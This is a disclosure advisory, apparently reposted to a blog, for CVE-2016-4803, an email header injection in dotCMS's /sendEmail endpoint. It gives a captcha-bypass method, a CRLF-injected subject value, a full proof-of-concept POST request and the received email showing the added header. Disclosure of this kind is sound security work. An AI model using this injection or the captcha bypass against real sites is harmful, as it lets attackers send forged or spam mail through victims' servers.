Title: CVE-2016-4803 dotCMS - Email Header Injection Credit: Elar Lang / http://ift.tt/1WV5vQa Vulnerability: Email Header Injection Vulnerable version: before 3.5 / 3.3.2 CVE: CVE-2016-4803 Vendor: dotCMS (http://dotcms.com/) # Description dotCMS has an email sending functionality at path /dotCMS/sendEmail/ Some parameters are vulnerable to Email Header Injection. # Preconditions There is no pre-condition on authentication or on authorization to access this functionality. If captcha is required for the web page, then the only precondition would be captcha. However, captcha is renewed only when you access the captcha image - in other words, you can load it once and manually set the correct value. After this step the "captcha effect" is bypassed. # Proof-of-Concept Proof-of-Concept is made on dotCMS demo site with dotCMS version 3.2.1 on 7th of December 2015. ## Value for subject (%0D%0A is for \r\n): subject=subject%0D%0AX-PoC-of-New-Line%3A+True ## Proof-of-Concept POST request:
POST /dotCMS/sendEmail HTTP/1.1 Host: demo2.dotcms.com ... Cookie: _JSESSIONID=998ADA19C99505E75DC6D27A5E84D...; ... Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 218 from=myemail&to=youremail&subject=subject%0D%0AX-PoC-of-New-Line%3A+True&returnUrl=%2F1&invalidCaptchaReturnUrl=%2F2&useCaptcha=true&captcha=hwxc5&comments=some+content&send=Send
## Received email source:
Message-ID: <1894336506.1449476889789.JavaMail.dotcms@democms1.dotcms.net> From: myemail To: youremail Subject: subject X-PoC-of-New-Line: True MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=
Source: Gmail -> IFTTT-> Blogger
No comments:
Post a Comment